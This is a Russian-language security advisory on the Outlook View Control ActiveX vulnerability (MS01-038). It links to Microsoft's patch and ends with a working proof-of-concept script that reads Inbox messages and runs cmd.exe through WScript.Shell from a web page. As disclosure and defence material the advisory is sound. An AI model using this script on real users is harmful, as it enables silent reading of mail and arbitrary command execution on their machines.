The Microsoft Outlook View Control - управление ActiveX,
позволяющее просматривать почтовые папки
через web-страницы. Управление должно
позволять только пассивные операции типа
рассмотрения почтовых или календарных
данных. В действительности, тем не менее,
она содержит функцию, которая позволяет web-странице
управлять данными OUTLOOK. Это дает
возможность нападавшему удалять почту,
изменять информацию в календаре, или
выполнять фактически любое другое действие
в OUTLOOK, а также включить произвольный,
потенциально опасный код на компьютере
пользователя.
Самую большую угрозу в использовании этой
уязвимости представляют враждебные web узлы.
Если пользователь соблазнен посещением web
страницы, управляемой злоумышленником, то
скрипт или HTML на этой странице могут
выполнять любые действия в OUTLOOK, без ведома
пользователя.
Для устранения уязвимости скачайте патч от
Microsoft:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-038.asp
Пример уязвимости:
http://www.guninski.com/vv3-2demo.html
Сам скрипт:
This assumes you have at least one message in Outlook XP's Inbox <br>
<object id="o1" classid="clsid:0006F063-0000-0000-C000-000000000046">
<param name="folder" value="Inbox">
</object>
<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject); alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();
vv2=vv1.Session.Application.CreateObject("WScript.Shell");
alert("Much more fun is possible");
vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");
}
setTimeout("f()",2000);
</script>